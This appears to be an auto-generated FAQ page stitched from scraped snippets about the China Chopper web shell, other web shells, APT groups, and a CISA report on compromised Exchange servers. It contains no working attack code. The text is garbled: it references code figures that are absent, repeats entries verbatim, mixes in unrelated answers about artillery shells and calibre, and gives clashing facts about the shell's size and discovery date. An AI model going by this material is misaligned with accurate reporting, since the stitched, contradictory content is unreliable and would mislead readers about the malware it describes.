What is China Chopper and how does it work?
China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. [1] It has been used by several threat groups. [2] [3] [4]
What is the China Chopper web shell?
Among web shells used by threat actors, the China Chopper web shell is one of the most widely used. One example is written in ASP: We have seen this malicious ASP code within a specially crafted file uploaded to web servers: Figure 2.
What language is China Chopper written in?
Another China Chopper variant is written in PHP: Meanwhile, the KRYPTON group uses a bespoke web shell written in C# within an ASP.NET page: Figure 3. Web shell written in C# within an ASP.NET page Once a web shell is successfully inserted into a web server, it can allow remote attackers to perform various tasks on the web server.
What is China Chopper in OAB VD?
In the OAB VD, the ExternalUrl parameter contains a "China Chopper" webshell which may permit a remote operator to dynamically execute JavaScript code on the compromised Microsoft Exchange Server. For a downloadable copy of IOCs, see: MAR-10331466-1.v1.stix.
What is China Chopper malware?
China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers.
What is chopper web shell connection?
China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. It has been used by several threat groups.
How does a Webshell work?
During a web shell attack, a cybercriminal injects a malicious file into a target web server's directory and then executes that file from their web browser.
What is a shell cyber security?
Web shells are malicious scripts that enable threat actors to compromise web servers and launch additional attacks. Threat actors first penetrate a system or network and then install a web shell.
What is APT41?
APT41 is a prolific Chinese state-sponsored espionage group known to target organizations in both the public and private sectors and also conducts financially motivated activity for personal gain.
What is a PAS Webshell?
P.A.S. Webshell is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.
How does China Chopper work?
China Chopper is an increasingly popular Web shell that packs a powerful punch into a small package. In the space of just 4 kilobytes, the Web shell offers file and database management, code obfuscation, and more—all in an easy-to-use graphical user interface that even novices can use.
What does the backdoor script Webshell run on?
A generic PHP web shell backdoor allows attackers to run commands on your PHP server much like an administrator. At times, the attackers may also attempt to escalate privileges. Using this shell, the attackers can: Access any type of data on your server.
What is shell exploit?
A web shell exploit usually contains a backdoor that allows an attacker to remotely access and possibly control a server at any time. This would prevent the attacker from having to exploit a vulnerability whenever access to the compromised server is required.
What is shell bomb?
A shell, in a military context, is a projectile whose payload contains an explosive, incendiary, or other chemical filling. Originally it was called a bombshell, but "shell" has come to be unambiguous in a military context. Modern usage sometimes includes large solid kinetic projectiles that is properly termed shot.
What is a Godzilla Webshell?
Godzilla is a functionality-rich webshell that parses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.
How Web shells are installed?
Web shells are installed through vulnerabilities in web application or weak server security configuration including the following: SQL injection; Vulnerabilities in applications and services (e.g. web server software such as NGINX or content management system applications such as WordPress);
What is a Godzilla Webshell?
Godzilla is a functionality-rich webshell that parses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.
How Web shells are installed?
Web shells are installed through vulnerabilities in web application or weak server security configuration including the following: SQL injection; Vulnerabilities in applications and services (e.g. web server software such as NGINX or content management system applications such as WordPress);
What is PHP Webshell?
A web shell is a piece of malicious code, often written in typical web development programming languages such as ASP, PHP and JSP, that attackers implant on web servers to provide remote access and code execution to server functions.
How are shells measured?
Ammunition size is usually expressed in terms of calibre, which is the diameter of the projectile as measured in millimetres or inches. In general, projectiles less than 20 mm or . 60 inch in diameter are classified as small-arm, and larger calibres are considered artillery.
Notification
This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
Summary
CISA received three unique files for analysis. The files appears to contain configuration data for Microsoft Exchange Offline Address Book (OAB) Virtual Directories (VD) extracted from a Microsoft Exchange Server. The output file shows malicious modifications for the ExternalUrl parameter.
Mitigation
If you find these webshells as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.
Recommendations
CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
Contact Information
CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/
Document FAQ
What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
Revisions
This product is provided subject to this Notification and this Privacy & Use policy.
What is China Chopper?
The fact that China Chopper is a tool used by certain APT groups and the fact that China Chopper was specifically used to attack the vulnerable Microsoft services leads us to believe that additional APT groups are targeting these vulnerabilities.
When was the zero day attack on China Chopper?
Over the last few days, Cynet identified a high number of China Chopper related web-shell attacks, which can be related to the zero-day attack posted by Microsoft on March 2 nd.
What is the Cynet 360 attack?
Cynet 360 detected and prevented China Chopper web shell activity on several customers’ Exchange Servers. In all cases, the compromised servers were Internet Information Services (IIS), which potentially means that these attacks are related to the Microsoft vulnerabilities just published.
What is the role of threat groups in a compromised machine?
The threat group gains an initial foothold on the compromised machine for further post-exploitation activities such as persistence, privilege escalation, lateral movement and impact.
Is Exchange 2010 vulnerable?
It is important to note that an Exchange 2010 security update has also been issued, though the CVEs do not reference that version as being vulnerable.
Does China Chopper have a pattern?
We have detected that all China Chopper remote commands have a unique pattern that can help identify the execution of the malicious commands.
What web shell is used by threat actors?
Among web shells used by threat actors, the China Chopper web shell is one of the most widely used. One example is written in ASP:
What is the purpose of checking perimeter firewall and proxy?
Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.
What are the weaknesses of internet-facing servers?
These include the lack of the latest security updates, antivirus tools, network protection, proper security configuration, and informed security monitoring. Interestingly, we observed that attacks usually occur on weekends or during off-hours, when attacks are likely not immediately spotted and responded to.
Is China Chopper a backdoor Trojan?
A Web shell that's equally compatible with both Linux and Windows-based PCs, China Chopper is another backdoor Trojan used in targeted attacks against specific companies – most likely for the sake of corporate espionage, although China Chopper's attacks are equally effective for other criminal purposes.
Is China Chopper a malware?
The infectious component of China Chopper is well under a single megabyte in size, and most anti-malware products have not yet developed a proper identification entry for China Chopper – despite China Chopper having been identified as a PC threat since at least November of last year.
What are the major threat actors known to leverage web shell techniques in their attacks?
Some major threat actors commonly known to leverage web shell techniques in their attacks include APT39, Deep Panda, Leviathan, and APT34 (or OilRig).
What is the APT39?
APT39 APT39 has installed ANTAK and ASPXSPY web shells. APT39 is an Iranian cyber espionage group that has been active since at least 2014. They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran's national priorities.
